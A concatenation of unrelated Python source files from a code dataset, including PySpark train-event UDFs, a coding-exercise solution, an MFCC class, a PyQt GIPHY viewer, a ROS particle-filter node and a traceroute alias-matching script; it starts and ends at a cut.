pd.to_numeric(pd.to_datetime(df['DateTime']))/1e9 #convert ns to s\n\n #Get Start Event times - startID can be changed for any event to anaylse train behaviour around that event\n startID = 65533\n startEvents = df[df['EventID']==startID]\n\n #if no start events for CSN, return empty array, otherwise perfrom calcs - reccommend that a check is performed after the calling of this function to check if any Datetime is listed as 'WRONG:\n if startEvents.empty:\n otherEvents = pd.DataFrame([[gr,65533,'WRONG',1,2,3]])\n else:#Otherwise...\n otherEvents = df[df['EventID']!=startID] #Remove the start events\n st = startEvents['DateTimeInt'].values #outputs a list\n ot = otherEvents['DateTimeInt'].values\n \n #put into a numpy array to make use of numpy functions\n stNp = np.array(st) #stNp is a list of the times of the start events for the time period - compare time of each event to these vals\n otNp = np.array(ot)\n \n #Get shape of df to find no of rows\n col = len(ot)\n ot = ot.reshape(col,1)\n\n #Add start times to each row of dataframe\n stList = stNp #Declaring the list to be appending stNp to\n for i in range(col-1):\n stList = np.vstack((stList,stNp))\n \n #compute the time diff for each start time\n timeDiff = ot - stList\n \n #Find the minimum time value, and the index which it occurs at\n x = np.argmin(abs(timeDiff),axis=1).reshape(col,1)\n otherEvents['startIndex'] = x\n \n #Store the minimum time in the correct rows\n timeDiffResult = []\n for i in range(col):\n val = (timeDiff[i,x[i]])\n timeDiffResult.append(val[0])\n\n #Make new numpy of timeDiffResult and get min - NOT USED ANY MORE\n minTime = np.argmin(abs(np.array(timeDiffResult)))\n\n #Make new col with the time ebtween said event and the nearest start Time\n otherEvents['TimeToStart'] = (timeDiffResult)\n\n\n return otherEvents\n\n\n\n\nschemaTOO = StructType([\n StructField(\"CSN\", StringType()),\n StructField(\"Good\", LongType()),\n StructField(\"Bad\", LongType())\n])\n\n@pandas_udf(schemaTOO, functionType=PandasUDFType.GROUPED_MAP)\n\ndef timeOnOff(df):\n #Order the data by time (Seconds) and get time Diff\n df = df.sort_values(['DateTime']) #start events\n DateTime = pd.to_numeric(pd.to_datetime(df['DateTime']))/1e9 #convert ns to s\n DateTimeNext = DateTime.shift(periods=-1) # -1 because we want to find the gap until the NEXT one (ie. if THIS event failed)\n\n #get event ID diff - no sort\n EventID = df['EventID']\n EventIDNext = EventID.shift(periods=-1).values\n EventID = EventID.values\n\n #Remove last row\n EventID = EventID[:-1]\n EventIDNext = EventIDNext[:-1]\n\n EventIDDiff = abs(EventIDNext - EventID)\n #Good where start-shut-start-shut\n good = sum(EventIDDiff)\n bad = len(EventIDDiff) - good\n\n gr = df['CSN'].iloc[0]\n default_df = pd.DataFrame([[gr,good,bad]])\n return default_df\n\n\n\n\n##SHUT TIMES UDF\nschemaShT = StructType([\n StructField(\"CSN\", StringType()),\n StructField(\"EventID\", LongType()),\n StructField(\"DateTime\", StringType())\n])\n@pandas_udf(schemaShT, functionType=PandasUDFType.GROUPED_MAP)\ndef shutTimes(df):\n gr = df['CSN'].iloc[0]#used for the default returned dataframe if no data being returned\n EventID = 65534\n events = df[df['EventID']==EventID].sort_values(['DateTime']) #start events\n DateTime = pd.to_numeric(pd.to_datetime(events['DateTime']))/1e9 #convert ns to s\n DateTimeNext = DateTime.shift(periods=-1) # -1 because we want to find the gap until the NEXT one (ie. if THIS event failed)\n time_diff = (DateTimeNext-DateTime)\n df_less15m = events[((time_diff>(10*60)) | (time_diff.isnull()))]#more than 30 min\n default_df = pd.DataFrame([[gr,EventID,'None']])\n if len(df_less15m.index)>0:\n return_df = pd.DataFrame(df_less15m[['CSN','EventID','DateTime']])\n #reset column names, this needs to be done otherwise it won't match the schema above. It works when we do .mean() etc\n #because that doesn't give a named column when we create the dataframe, whereas this does.\n return_df = return_df.T.reset_index(drop=True).T #this feels hacky\n return return_df\n else:\n return default_df\n\n\n","sub_path":"TrainDNAFunctions.py","file_name":"TrainDNAFunctions.py","file_ext":"py","file_size_in_byte":9352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"323432824","text":"from itertools import combinations\nfrom collections import Counter\ndef solution(orders, course):\n answer = []\n for k in course: #코스요리의 단품 주문 종류 ex) [2,3,4] -> AB... / ADF... / ABCD...\n candidates = []\n for menu_li in orders:\n for li in combinations(menu_li, k): #iterable한 자료를 중복되지 않는 k 크기의 조합들로 만든다.(순열과는 다름.)\n res = ''.join(sorted(li)) #만들어진 k크기의 조합을 알파벳순으로 정렬해서 문자열로 만든다.\n candidates.append(res) #만들어진 문자열은 코스요리 추가 후보로 리스트에 추가한다.\n sorted_candidates = Counter(candidates).most_common()\n #코스요리 추가 후보 리스트를 Counter객체로 만든후 가장 많이 주문된 순으로 나열한다. ex) (AB,4),(AF,3)....\n answer += [menu for menu, cnt in sorted_candidates if cnt > 1 and cnt == sorted_candidates[0][1]]\n #가장 많이 주문된 순으로 정렬된 코스요리 리스트중에서 가장 많이 주문된 메뉴를 answer 리스트에 추가한다.\n #if cnd > 1 -> 가장 많이 주문되었더라도 1번 주문은 제외\n # and cnt == sorted_candates[0][1] -> 제일 많이 주문된 메뉴의 sorted_candates[0][1]은 주문횟수\n return sorted(answer) #알파벳순으로 정렬하여 return\n\n# n = list(input().split())\n# m = list(map(int,input().split()))\n# print(solution(n,m))\n\n# ABCFG AC CDE ACDE BCFG ACDEH\n# 2 3 4","sub_path":"2.메뉴_리뉴얼.py","file_name":"2.메뉴_리뉴얼.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"498631813","text":"\nfrom .base import Representation\n\nfrom acousticsim.exceptions import AcousticSimError\nfrom acousticsim.analysis.mfcc import file_to_mfcc, file_to_mfcc_praat\n\n\nclass Mfcc(Representation):\n \"\"\"\n Mel frequency cepstrum coefficient representation of a sound.\n\n Parameters\n ----------\n file_path : str\n Filepath of wav file to process\n\n min_freq : int\n Minimum frequency in Hertz\n\n max_freq : int\n Maximum frequency in Hertz\n\n num_coeffs : int\n Number of cepstrum coefficients\n\n win_len : float\n Window length in seconds\n\n time_step : float\n Time step between successive frames\n\n num_filters : int, defaults to 26\n Number of triangular filters in the filterbank\n\n use_power : bool, defaults to True\n Flag for keeping first cepstrum coefficient, which corresponds\n to the power in the frame\n\n deltas : bool, defaults to False\n Flag to calculate the delta coefficients\n \"\"\"\n _is_windowed = True\n\n def __init__(self, file_path, win_len, time_step, min_freq=80, max_freq=7800,\n num_filters=26, num_coeffs=13, use_power=True, deltas=False, data=None, attributes=None):\n Representation.__init__(self, file_path, data, attributes)\n self.min_freq = min_freq\n self.max_freq = max_freq\n self.num_coeffs = num_coeffs\n self.ranges = [None] * self.num_coeffs\n self.win_len = win_len\n self.time_step = time_step\n self.num_filters = num_filters\n self.use_power = use_power\n self.deltas = deltas\n\n def process(self, algorithm='rastamat', executable_path=None, reset=False):\n if algorithm not in ['rastamat', 'praat']:\n raise AcousticSimError('Formant algorithm must be one of: lpc, praat')\n if reset:\n self.data = {}\n if self.data:\n raise AcousticSimError('Data already exists for this representation, use reset=True to generate new data.')\n if algorithm == 'rastamat':\n data = file_to_mfcc(self.file_path, self.win_len, self.time_step, self.min_freq, self.max_freq,\n self.num_filters, self.num_coeffs, self.use_power, self.deltas)\n else:\n data = file_to_mfcc_praat(self.file_path, executable_path, self.win_len, self.time_step,\n self.min_freq, self.max_freq,\n self.num_filters, self.num_coeffs, self.use_power, self.deltas)\n self.data = data\n\n def norm_amp(self, new_ranges):\n \"\"\"\n Normalize the ranges of coefficients to a set of ranges.\n\n Parameters\n ----------\n new_ranges : list of tuple\n New ranges for each coefficient to normalize to\n\n \"\"\"\n for i, r in enumerate(new_ranges):\n new_min, new_max = r\n if self.ranges[i] is None:\n old = [x[i] for x in self.data.values()]\n self.ranges[i] = [min(old), max(old)]\n for k, v in self.data.items():\n normed = (v[i] - self.data[i][0]) / (self.data[i][1] - self.data[i][0])\n self.data[k][i] = (normed * (new_max - new_min)) + new_min\n","sub_path":"acousticsim/representations/mfcc.py","file_name":"mfcc.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"195793798","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'ipetrash'\n\n\n# SOURCE: https://ru.stackoverflow.com/q/1134473/201445\n\n\nimport json\nimport time\nimport sys\nfrom pathlib import Path\n\nimport requests\n\nfrom PyQt5.QtWidgets import (\n QApplication, QMainWindow, QVBoxLayout, QHBoxLayout, QFrame, QMessageBox,\n QLineEdit, QPushButton, QLabel, QScrollArea, QWidget, QGridLayout\n)\nfrom PyQt5.QtCore import QThread, pyqtSignal, Qt, QRegExp\nfrom PyQt5.QtGui import QRegExpValidator, QMovie\n\nfrom config import GIPHY_API_KEY\n\n# Absolute file name\nTEMP_DIR = Path(__file__).resolve().parent / 'temp'\nTEMP_DIR.mkdir(exist_ok=True)\n\n\ndef log_uncaught_exceptions(ex_cls, ex, tb):\n text = '{}: {}:\\n'.format(ex_cls.__name__, ex)\n import traceback\n text += ''.join(traceback.format_tb(tb))\n\n print(text)\n QMessageBox.critical(None, 'Error', text)\n sys.exit(1)\n\n\nsys.excepthook = log_uncaught_exceptions\n\n\nclass SearchGifThread(QThread):\n SITE_URL = 'https://api.giphy.com/v1'\n\n about_add_gif = pyqtSignal(dict)\n\n def __init__(self, name_gif=None):\n super().__init__()\n\n self.name_gif = name_gif\n\n def get_gif(self) -> dict:\n url = f'{SearchGifThread.SITE_URL}/gifs/search?api_key={GIPHY_API_KEY}&q={self.name_gif}'\n\n try:\n rs = requests.get(url)\n rs.raise_for_status()\n\n data = json.loads(rs.content.decode('utf-8'))['data']\n if not data:\n # TODO: emit 'not found' to MainWindow\n data = {'error': 1}\n return data\n\n return data\n\n except Exception as err:\n # TODO: emit error to MainWindow\n print(err)\n\n return {'error': 1}\n\n def _process_gif(self, data: dict, index: int) -> dict:\n url_gif = data[index]['images']['fixed_width']['url']\n image_rs = requests.get(url_gif)\n image_rs.raise_for_status()\n\n file_name = TEMP_DIR / f\"img{index}.gif\"\n with open(file_name, 'wb') as f:\n f.write(image_rs.content)\n\n data = {'row': index // 3, 'col': index % 3, 'error': None, 'file_name': str(file_name)}\n return data\n\n def run(self):\n data = self.get_gif()\n if 'error' in data:\n # TODO: emit error to MainWindow\n return\n\n for i in range(20):\n data_gif = self._process_gif(data, i)\n self.about_add_gif.emit(data_gif)\n\n time.sleep(1)\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.width = self.size().width()\n self.height = self.size().height()\n self.left = 200\n self.top = 300\n self.title = 'Gif Manager'\n\n self.search_gif_thread = SearchGifThread()\n self.search_gif_thread.started.connect(self.on_start)\n self.search_gif_thread.finished.connect(self.on_finish)\n self.search_gif_thread.about_add_gif.connect(self.add_gif)\n\n self.init_window()\n self.init_ui()\n\n self.gif_edit.setText('cat')\n\n def init_window(self):\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.setWindowTitle(self.title)\n\n def init_ui(self):\n root_layout = QVBoxLayout()\n gif_data_layout = QHBoxLayout()\n gif_data_layout.setAlignment(Qt.AlignTop)\n self.gif_data_frame = QFrame()\n self.gif_edit = QLineEdit()\n self.gif_edit.returnPressed.connect(self.search_gif)\n regex = QRegExp('[a-z-A-Z]+')\n validator = QRegExpValidator(regex)\n self.gif_edit.setValidator(validator)\n self.gif_edit.setPlaceholderText('Enter name gif')\n gif_search_button = QPushButton('Search gif')\n gif_search_button.clicked.connect(self.search_gif)\n gif_data_layout.addWidget(self.gif_edit)\n gif_data_layout.addWidget(gif_search_button)\n self.gif_data_frame.setLayout(gif_data_layout)\n root_layout.addWidget(self.gif_data_frame)\n self.info_label = QLabel('Something went wrong. Check that the request was made correctly.')\n self.info_label.setAlignment(Qt.AlignHCenter)\n self.info_label.hide()\n root_layout.addWidget(self.info_label)\n self.scroll = QScrollArea()\n self.scroll.setStyleSheet('background: rgba(255, 255, 255, 30%);')\n self.scroll.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\n self.scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.scroll.setWidgetResizable(True)\n scrollWidget = QWidget()\n self.gifs_layout = QGridLayout()\n scrollWidget.setLayout(self.gifs_layout)\n self.scroll.setWidget(scrollWidget)\n root_layout.addWidget(self.scroll)\n root_widget = QWidget()\n root_widget.setLayout(root_layout)\n self.setCentralWidget(root_widget)\n\n def on_finish(self):\n self.gif_data_frame.show()\n\n def on_start(self):\n self.info_label.hide()\n self.scroll.show()\n self.gif_data_frame.hide()\n\n def search_gif(self):\n # TODO: replace on QListWidget\n for i in range(self.gifs_layout.count()):\n self.gifs_layout.itemAt(i).widget().deleteLater()\n\n self.search_gif_thread.name_gif = self.gif_edit.text()\n self.search_gif_thread.start()\n\n def add_gif(self, data):\n if data['error']:\n self.gif_data_frame.show()\n self.scroll.hide()\n self.info_label.show()\n return\n\n row, col, error, file_name = data.values()\n movie = QMovie(file_name)\n movie.setSpeed(200)\n label_gif = QLabel()\n label_gif.setMovie(movie)\n movie.start()\n\n self.gifs_layout.addWidget(label_gif, row, col)\n label_gif.show()\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n mw = MainWindow()\n mw.show()\n\n sys.exit(app.exec_())\n","sub_path":"qt__pyqt__pyside__pyqode/GIPHY__gif/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"404298654","text":"# -*- coding: utf-8 -*-\n\nfrom scrapy.item import Item, Field\nfrom scrapy.loader import ItemLoader\nfrom scrapy.loader.processors import TakeFirst, MapCompose, Join\n\nclass LeboncoinItem(Item):\n doc_id = Field()\n doc_url = Field()\n \n title = Field()\n desc = Field()\n c = Field()\n \n img_urls = Field()\n thumb_urls = Field()\n \n user_url = Field()\n user_id = Field()\n user_name = Field()\n\n upload_date = Field()\n upload_epoch = Field()\n \n check_date = Field()\n check_epoch = Field()\n\n urg = Field()\n premium = Field()\n \n\n region = Field()\n addr_locality = Field()\n location = Field()\n","sub_path":"scrapy/leboncoin/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"482796400","text":"#!/usr/bin/env python\n\n#-----------------------------------------------------------------------------\n# University of California Berkeley\n# Department of Mechanical Engineering\n# Model Predictive Control Laboratory\n#\n# Capstone Project 2015-2016:\n# Fault-Tolerant Control in Autonomous Driving - Team A (Localization)\n#\n# Team-Members : Leo Li\n# Joe Wu\n# Byunghyun Shin\n# Kilian Schindler\n#\n# Supervisors : Francesco Borrelli (Prof. Dr.)\n# Ashwin Carvalho\n#-----------------------------------------------------------------------------\n#\n# ABOUT THIS FILE\n# This file is going to be the ROS node executing the particle filter. However,\n# it still needs to be implemented.\n#\n# REVISION HISTORY\n# [Mar 18, 2016] created\n# [Mar 30, 2016] work in progress - left to do:\n# 1.) read in V_lateral_meas and dot_Psi_mes\n# 2.) think about what to do if other meaurements than GPS\n# are not available\n# 3.) what if computation takes more than allotted time\n#\n#-----------------------------------------------------------------------------\n\n\n\nimport rospy\nimport numpy as np\nfrom std_msgs.msg import String, Float64, Int32\nfrom localize.msg import LaneMeasure\nfrom geometry_msgs.msg import Pose2D\nimport LPF_functions_rosnode as pf\nimport logging\n\n\n\nlogging.basicConfig(filename='/home/mpc/Localization/workspace/src/localize/log/test1.log',level=logging.DEBUG)\n\n\n\nX_meas = 0.\nY_meas = 0.\nPsi_meas = 0.\ndot_Psi_meas = 0.\nV_straight_meas = 0.\nV_lateral_meas = 0.\ndel_f_meas = 0.\n\na_r0 = 0.\na_r1 = 0.\na_r2 = 0.\na_r3 = 0.\na_r_quality = 0.\n\na_l0 = 0.\na_l1 = 0.\na_l2 = 0.\na_l3 = 0.\na_l_quality = 0.\n\nGPS_available = 0\nV_straight_available = 0\ndel_f_available = 0\nV_lateral_available = 0\ndot_Psi_available = 0\nRightLane_available = 0\nLeftLane_available = 0\n\n\n\n##############################################################################\n## ----------------- ADJUST PARTICLE FILTER SETTINGS HERE ----------------- ##\n## vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv ##\n\n\n## 1.) Iteration Frequency [Hz]\n################################\nfrequency = 50\n\n\n## 2.) Track Data (un-comment one option below)\n################################################\n#filepath = '../../../../Data Files/CAN/CPG_Oval/t1.mat'\n#filepath = '../../../../Data Files/CAN/CPG_WindingTrack/WT_LSRL_clean.mat'\n\n\n## 3.) Origin of GPS coordinate frame\n#######################################\nGPS_Pos0 = [-118.0266,35.0536]\n\n\n## 4.) Model and Sensor Setting\n################################\nactivate_DynamicModel = 1\nactivate_LaneMeas = 1\n\n\n## 5.) GPS Acceptance Settings\n###############################\nGPS_accept_interval = 10\nGPS_deny_interval = 100\nactivate_GPS_reset = 1\n\n\n## 6.) Filter Parameters\n##########################\n\n# number of particles\nnum_particles = 100\n\n# bias of V_lateral signal (guessed by Ashwin, needs to be measured)\ngps_V_lateral_bias = 0.02\n\n# standard deviation of process noise for dt = 0.02s\nstraight_position_noise = 0.01 # tuned ('run_LPF_OverallParamTuning.m')\nturn_position_noise = 0.0005 # tuned ('run_LPF_OverallParamTuning.m')\nlateral_velocity_noise = 0.1 # tuned ('run_LPF_OverallParamTuning.m')\nturn_velocity_noise = 0.0001 # tuned ('run_LPF_OverallParamTuning.m')\n\n# standard deviation of measurement noise\ngps_X_noise = 0.03 # tuned ('run_LPF_OverallParamTuning.m')\ngps_Y_noise = 0.03 # tuned ('run_LPF_OverallParamTuning.m')\ngps_Psi_noise = 0.002 # tuned ('run_LPF_OverallParamTuning.m')\ngps_V_lateral_noise = 0.002 # tuned ('run_LPF_OverallParamTuning.m')\ndot_Psi_noise = 0.005 # tuned ('run_LPF_OverallParamTuning.m')\na_r0_noise = 0.005 # tuned ('run_LPF_OverallParamTuning.m')\na_l0_noise = 0.005 # tuned ('run_LPF_OverallParamTuning.m')\na_r1_noise = 0.0005 # tuned ('run_LPF_OverallParamTuning.m')\na_l1_noise = 0.0005 # tuned ('run_LPF_OverallParamTuning.m')\n\n# vehicle parameters\nmass = 1840.0 # [kg] mass of test vehicle\nIzz = 3477.0 # [kg*m^2] yaw moment of inertia\nlf = 1.105 # [m] distance from center of mass to front axis\nlr = 1.738 # [m] distance from center of mass to rear axis\n\n# Pacejka tire model parameters\nB_f = 0.1447\nB_r = 0.1678\nC_f = 0.1463\nC_r = 0.1709\nD_f = 1.9227e6\nD_r = 2.2490e6\nE_f = -0.3782\nE_r = -0.4420\n\n# thresholds for different functions\nPsi_rel_threshold = 1e-6 # maximum Psi_rel to be considered aligned [rad]\nLane_threshold = 5 # maximum acceptable distance to lanes [m]\nDynamicModel_threshold = 5 # minimum velocity to run dynamic model [m/s]\n\n# fraction of particles receiving throughput measurements\nfrac_through = 0.1\n\n\n## ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ##\n## ----------------- ADJUST PARTICLE FILTER SETTINGS HERE ----------------- ##\n##############################################################################\n\n\n\n# create GPS_available vector (determines access to GPS measurements) and initialize GPS_count\nGPS_accept = np.concatenate((np.ones(GPS_accept_interval),np.zeros(GPS_deny_interval)),axis=0)\nGPS_count = -1.\n\n\n\ndef callback1(pose):\n global X_meas, Y_meas, Psi_meas, GPS_available\n X_meas = pose.x\n Y_meas = pose.y\n Psi_meas = pose.theta\n GPS_available = 1\n #rospy.loginfo(\"Received GPS measurement.\")\n\ndef callback2(speed_straight):\n global V_straight_meas, V_straight_available\n V_straight_meas = speed_straight.data\n V_straight_available = 1\n #rospy.loginfo(rospy.get_caller_id() + \"Velocity = %f\\n\", v)\n\ndef callback3(sas):\n global del_f_meas, del_f_available\n del_f_meas = sas.data\n del_f_available = 1\n #rospy.loginfo(rospy.get_caller_id() + \"Steering Angle = %f\\n\", del_f)\n \ndef callback4(speed_lateral):\n global V_lateral_meas, V_lateral_available\n V_lateral_meas = speed_lateral.data\n V_lateral_available = 1\n #rospy.loginfo(rospy.get_caller_id() + \"Steering Angle = %f\\n\", del_f)\n \ndef callback5(dot_Psi):\n global dot_Psi_meas, dot_Psi_available\n dot_Psi_meas = dot_Psi.data\n dot_Psi_available = 1\n #rospy.loginfo(rospy.get_caller_id() + \"Steering Angle = %f\\n\", del_f)\n\ndef callback6(leftLane):\n global a_l0, a_l1, a_l2, a_l3, a_l_quality, LeftLane_available\n #left = (leftLane.a0,leftLane.a1,leftLane.a2,leftLane.a3,leftLane.quality)\n a_l0 = leftLane.a0\n a_l1 = leftLane.a1\n a_l2 = leftLane.a2\n a_l3 = leftLane.a3\n a_l_quality = leftLane.quality\n LeftLane_available = 1\n #rospy.loginfo(rospy.get_caller_id() + \"Left lane measurements received\\n\")\n\ndef callback7(rightLane):\n global a_r0, a_r1, a_r2, a_r3, a_r_quality, RightLane_available\n #right = (rightLane.a0,rightLane.a1,rightLane.a2,rightLane.a3,rightLane.quality)\n a_r0 = rightLane.a0\n a_r1 = rightLane.a1\n a_r2 = rightLane.a2\n a_r3 = rightLane.a3\n a_r_quality = rightLane.quality\n RightLane_available = 1\n #rospy.loginfo(rospy.get_caller_id() + \"Right lane measurements received\\n\")\n\n\ndef location_sender():\n global GPS_count, GPS_available, V_straight_available, del_f_available, V_lateral_available, dot_Psi_available, RightLane_available, LeftLane_available\n \n # initialize node\n rospy.init_node('location_sender', anonymous=True)\n \n # subscriptions\n # once location_sender receives the data it uses callback functions to update the variables\n rospy.Subscriber(\"pose\", Pose2D, callback1) \n rospy.Subscriber(\"speed_straight\", Float64, callback2)\n rospy.Subscriber(\"sas\", Float64, callback3)\n rospy.Subscriber(\"speed_lateral\", Float64, callback4)\n rospy.Subscriber(\"dot_Psi\", Float64, callback5)\n rospy.Subscriber(\"leftLane\", LaneMeasure,callback6)\n rospy.Subscriber(\"rightLane\",LaneMeasure,callback7)\n\n # publications\n pub = rospy.Publisher('location', Pose2D, queue_size=10)\n pub2 = rospy.Publisher('runtime', Int32, queue_size=10)\n \n # define filter rate\n rate = rospy.Rate(frequency) # 50hz\n \n \n \n # run localization particle filter\n while not rospy.is_shutdown():\n\n\n tic = rospy.get_rostime()\n \n \n GPS_count = (GPS_count+1) % (GPS_accept_interval+GPS_deny_interval)\n\n \n (X_estimate, Y_estimate, Psi_estimate) = pf.LPF_main( \\\n 1.0/frequency, num_particles, GPS_available*GPS_accept[GPS_count], \\\n activate_LaneMeas, activate_DynamicModel, activate_GPS_reset, \\\n X_meas, Y_meas, Psi_meas, dot_Psi_meas, \\\n V_straight_meas, V_lateral_meas, del_f_meas, \\\n a_r0, a_r1, a_r2, a_r3, a_r_quality, \\\n a_l0, a_l1, a_l2, a_l3, a_l_quality, \\\n straight_position_noise, turn_position_noise, lateral_velocity_noise, turn_velocity_noise, \\\n gps_X_noise, gps_Y_noise, gps_Psi_noise, gps_V_lateral_noise, dot_Psi_noise, \\\n a_r0_noise, a_l0_noise, a_r1_noise, a_l1_noise, \\\n gps_V_lateral_bias, mass, Izz, lf, lr, \\\n Psi_rel_threshold, Lane_threshold, DynamicModel_threshold, \\\n B_f, B_r, C_f, C_r, D_f, D_r, E_f, E_r, \\\n np.floor(frac_through*num_particles))\n \n \n toc = rospy.get_rostime()\n difference = (toc.nsecs - tic.nsecs)\n rospy.loginfo(\"%i\\n\",difference)\n \n \n \n #dif = str(difference)\n #logging.info(\"%s\\n\",dif)\n pose_estimate = Pose2D(X_estimate,Y_estimate,Psi_estimate) #Assign particle filter output to the message for publishing\n #rospy.loginfo(pose_out) # log the output from particle filter\n pub.publish(pose_estimate) # Publish the output from particle filter\n pub2.publish(difference)\n \n \n \n # reset GPS arrived flag to 0\n GPS_available = 0\n V_straight_available = 0\n del_f_available = 0\n V_lateral_available = 0\n dot_Psi_available = 0\n RightLane_available = 0\n LeftLane_available = 0\n \n \n\n # sleep for rest of time \n rate.sleep()\n\n\n\nif __name__ == '__main__':\n try:\n location_sender()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"workspace/src/localize/scripts/LPF_rosnode.py","file_name":"LPF_rosnode.py","file_ext":"py","file_size_in_byte":10116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"530875447","text":"import ipaddress\nimport argparse\nimport sys\nfrom mysql.connector import connect\nfrom atlas.atlas_database import get_connection, get_select_alias_query, get_alias_sets\n\n\ndef get_vps():\n database = \"plcontroller\"\n query = (\n f\" SELECT ip, site FROM {database}.vantage_point \"\n )\n # print(query)\n\n # Get the connection to\n connection = get_connection(database)\n cursor = connection.cursor()\n cursor.execute(query, )\n rows = cursor.fetchall()\n vps = []\n for row in rows:\n ip, site = row\n vps.append(ip)\n cursor.close()\n connection.close()\n return vps\n\n\ndef check_destination_based_routing(tr_hops, tr_hop_ping_id_rr_hops):\n '''\n Perform a sanity check that next rr hop of current tr_hop is contained in the next tr_hop RR\n :param tr_hop_ping_id_rr_hops:\n :return:\n '''\n for i, tr_hop in enumerate(tr_hops):\n if tr_hop not in tr_hop_ping_id_rr_hops:\n continue\n # Is this hop in a tunnel?\n # Look at next hop\n\n # for dst_tr_hop, ping_id_rr_hops in :\n\n\ndef flatten_connected(successors_per_hop):\n for hop in successors_per_hop:\n successors = successors_per_hop[hop]\n prev_successors = set()\n while len(successors) != len(prev_successors):\n prev_successors = set(successors)\n new_successors = set(successors)\n for successor in successors:\n if successor in successors_per_hop:\n new_successors.update(successors_per_hop[successor])\n successors = new_successors\n successors_per_hop[hop] = successors\n\ndef compute_pred_succ_constraints(tr_hop_ping_id_rr_hops):\n '''\n Ugly implementation to find successors and predecessors of hops in RR\n :param tr_hop_ping_id_rr_hops:\n :return:\n '''\n predecessors_per_hop = {}\n successors_per_hop = {}\n for tr_hop, ping_id_rr_hops in tr_hop_ping_id_rr_hops.items():\n for _, rr_hops in ping_id_rr_hops.items():\n rr_hops = sorted(rr_hops, key=lambda x: x[1])\n for i in range(len(rr_hops)):\n rr_hop_i, _ = rr_hops[i]\n for j in range(i+1, len(rr_hops)):\n rr_hop_j, _ = rr_hops[j]\n predecessors_per_hop.setdefault(rr_hop_j, set()).add(rr_hop_i)\n successors_per_hop.setdefault(rr_hop_i, set()).add(rr_hop_j)\n\n # Flatten the predecessors so that every hop has the full set of predecessors/successors.\n flatten_connected(successors_per_hop)\n flatten_connected(predecessors_per_hop)\n\n return predecessors_per_hop, successors_per_hop\n\n\ndef match_rr_tr_hops(cursor, ips_for_alias_set, rr_hops_per_tr_id, tr_hops_per_tr_id, with_p2p):\n # Get the alias of all the IPs seen in the traceroutes\n alias_set_by_ip = get_alias_sets(tuple(ips_for_alias_set))\n\n # For each rr hop, a subpath corresponding to the potential intersection\n rr_intersection_rows_to_insert = []\n for tr_id, tr_hop_ping_id_rr_hops in rr_hops_per_tr_id.items():\n # if tr_id != 2467:\n # continue\n predecessors_per_hop, successors_per_hop = compute_pred_succ_constraints(tr_hop_ping_id_rr_hops)\n # print(tr_id)\n intersects_per_rr_hop = {}\n # Index per tr hop for faster retrieve\n tr_hops = tr_hops_per_tr_id[tr_id]\n tr_hops.sort(key=lambda x: x[1])\n index_per_tr_hop = {tr_hop[0]: i for i, tr_hop in enumerate(tr_hops)}\n\n aliases_tr = {alias_set_by_ip[hop[0]]: hop[0] for hop in tr_hops if hop[0] in alias_set_by_ip}\n p2p_tr = {str(ipaddress.ip_network(str(ipaddress.ip_address(hop[0])) + \"/30\", strict=False)): tr_hops[i - 1][0]\n for i, hop in enumerate(tr_hops)\n if i > 0\n }\n if with_p2p:\n aliases_tr.update(p2p_tr)\n # Two types of constraints\n # Alias and p2p link\n for dst_tr_hop, ping_id_rr_hops in tr_hop_ping_id_rr_hops.items():\n for ping_id, rr_hops in ping_id_rr_hops.items():\n # Sort the rr hops by their index\n rr_hops = sorted(rr_hops, key=lambda x: x[1])\n # Get the aliases in rr and tr hops\n matches_rr = [(i, hop[0], aliases_tr[alias_set_by_ip[hop[0]]], \"alias\")\n for i, hop in enumerate(rr_hops)\n if hop[0] in alias_set_by_ip\n and alias_set_by_ip[hop[\n 0]] in aliases_tr # Case where the rr hop is in another alias set not present in tr\n and hop[0] not in index_per_tr_hop\n ]\n if with_p2p:\n matches_p2p_rr = [(i, hop[0],\n aliases_tr[str(ipaddress.ip_network(str(ipaddress.ip_address(hop[0])) + \"/30\",\n strict=False))],\n \"p2p\")\n for i, hop in enumerate(rr_hops)\n if str(\n ipaddress.ip_network(str(ipaddress.ip_address(hop[0])) + \"/30\", strict=False)) in p2p_tr\n and hop[0] not in index_per_tr_hop]\n matches_rr.extend(matches_p2p_rr)\n matches_rr.sort(key=lambda x: x[0])\n\n for i, rr_hop in enumerate(rr_hops):\n if rr_hop[0] in index_per_tr_hop:\n continue\n previous_tr_hop = index_per_tr_hop[dst_tr_hop]\n next_hop_rr_alias = None\n for j, _, alias_tr, from_ in matches_rr:\n # Find the closest tr hops before and after this rr hop.\n if i == j:\n previous_tr_hop = index_per_tr_hop[alias_tr]\n next_hop_rr_alias = previous_tr_hop\n break\n elif i > j:\n candidate_previous_tr_hop_index = index_per_tr_hop[alias_tr]\n if candidate_previous_tr_hop_index > previous_tr_hop:\n previous_tr_hop = candidate_previous_tr_hop_index\n elif i < j:\n # It is a candidate after the RR hop, so the closest after the RR hop\n next_hop_rr_alias = index_per_tr_hop[alias_tr]\n break\n\n if next_hop_rr_alias is None:\n next_hop_rr_alias = max(index_per_tr_hop.values())\n if rr_hop[0] not in intersects_per_rr_hop:\n 